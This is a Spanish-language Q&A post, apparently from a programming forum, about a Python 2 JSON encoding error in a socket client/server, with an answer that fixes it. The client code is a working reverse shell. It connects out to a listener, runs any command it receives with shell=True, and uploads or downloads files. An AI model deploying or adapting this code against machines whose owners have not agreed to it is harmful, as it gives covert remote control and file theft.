# json.dumps no decodifica un byte correctamente. ('utf8' codec can't decode byte 0xa3 in position 43)

Tags: python, json, windows, python-2.7, socket

Estoy intentando crear un Cliente - Servidor para compartir datos entre dos maquinas diferentes.

El script funciona con sockets lo que nos permite entablar conexión con la otra maquina y ejecutar comandos en esta.
Para el intercambio de información lo que hago es usar serialización de los datos en json y enviarlos, a lo que la otra maquina deserializa esa información y la imprime.

Todo funciona correctamente excepto con un comando que solo afecta en windows "dir", este comando causa un error de UnicodeDecodeError, y no he podido solucionar, porque no sé como lo podria hacer.

(Cabe recalcar que si ejecuto todo esto en linux y uso "ls" funciona correctamente, esto solo afecta con "dir" de windows)

a continuación dejo el codigo del cliente y servidor.
(Todo debe ejecutarse en python2 ya que python3 da problemas al volver todo el json, lo cual pude solucionar pero me salia el mismo error que este, así que volvi a hacer todo en python2 pero nada)

**client.py**

```
import socket, subprocess
import json, base64
import os, sys, shutil

class Client:
    def __init__(self, ip, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

    def send_data(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def receive_data(self):
        json_data = ""
        while True:
            try:
                json_data = self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def com_exe(self, command):
        DEVNULL = open(os.devnull, "wb")
        return subprocess.check_output(command, shell = True, stderr = DEVNULL, stdin = DEVNULL)

    def ch_dir(self, path):
        os.chdir(path)
        return "[+] Changing directory to: " + path

    def read_file(self, path):
        with open(path, "rb") as file:
            return base64.b64encode(file.read())

    def write_file(self, path, content):
        with open(path, "wb") as file:
            file.write(base64.b64decode(content))
            return "[+] Upload completed successfully."

    def run(self):
        while True:
            command = self.receive_data()

            try:
                if command[0] == "exit":
                    self.connection.close()
                    sys.exit()
                elif command[0] == "cd" and len(command) > 1:
                    result = self.ch_dir(command[1])
                elif command[0] == "download":
                    result = self.read_file(command[1])
                elif command[0] == "upload":
                    result = self.write_file(command[1], result)
                else:
                    result = self.com_exe(command)
            except Exception:
                result = "[-] Error during command execution."

            self.send_data(result)

#try:
my_client = Client("192.168.0.15", 1234)
my_client.run()
#except Exception:
#    sys.exit()
```

**server.py**

```
import socket
import json, base64
import sys

class Server:
    def __init__(self, ip, port):
        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind((ip, port))
        server.listen(0)
        print("[+] Waiting for connections...")
        self.connection, address = server.accept()
        print("[+] Connection of: " + str(address))

    def send_data(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def receive_data(self):
        json_data = ""
        while True:
            try:
                json_data = self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def write_file(self, path, content):
        with open(path, "wb") as file:
            file.write(base64.b64decode(content))
            return "[+] Download complete."

    def read_file(self, path):
        with open(path, "rb") as file:
            return base64.b64encode(file.read())

    def com_exe(self, command):
        self.send_data(command)
        if command[0] == "exit":
            self.connection.close()
            sys.exit()
        return self.receive_data()

    def run(self):
        while True:
            command = raw_input(">> ")
            command = command.split(" ")

            try:
                if command[0] == "upload":
                    content = self.read_file(command[1])
                    command.append(content)

                result = self.com_exe(command)

                if command[0] == "download" and "[-] Error " not in result:
                    result = self.write_file(command[1], result)
            except Exception:
                result = "[-] Error during command execution."

            print(result)

try:
    my_server = Server("192.168.0.15", 1234)
    my_server.run()
except Exception:
    print("[-] Error during server execution.")
```

**Error (terminal del client.py)**

```
C:\Users\User\Documents\Programming\scripts>python client.py
Traceback (most recent call last):
  File "client.py", line 70, in <module>
    my_client.run()
  File "client.py", line 66, in run
    self.send_data(result)
  File "client.py", line 18, in send_data
    json_data = json.dumps(data)
  File "C:\Python27\lib\json\__init__.py", line 244, in dumps
    return _default_encoder.encode(obj)
  File "C:\Python27\lib\json\encoder.py", line 201, in encode
    return encode_basestring_ascii(o)
UnicodeDecodeError: 'utf8' codec can't decode byte 0xa3 in position 43: invalid
start byte
```

Agradezco mucho a la persona que me ayude.
Gracias.

Comment: me acuerdo haber tenido este problema por el hecho de que la consola no muestra correctamente los caracteres especiales como las letras con tilde y la ñ

Comment: Mmm... Entonces lo probaré con powersShell e intentar ver si arregla el problema, gracias.

Comment: creo que dará el mismo resultado, debe ser producto del idioma

Comment: Jumm, entonces creo que intentar el cifrado del dumps tal vez funcione, pero debo mirar si se puede hacer eso.

Answer (score 1):

Logré solucionar el problema, para eso lo que toca hacer es escapar los caracteres no ASCII `ensure_ascii = False` y para recibir los datos debemos decodificar todo a utf-8.

El pedazo de codigo que toca editar queda así:

```
def send_data(self, data):
        json_data = json.dumps(data, ensure_ascii = False)
        self.connection.send(json_data)

def receive_data(self):
        json_data = ""
        while True:
            try:
                json_data = self.connection.recv(4096)
                return json.loads(json_data.decode("utf-8", "ignore"))
            except ValueError:
                continue
```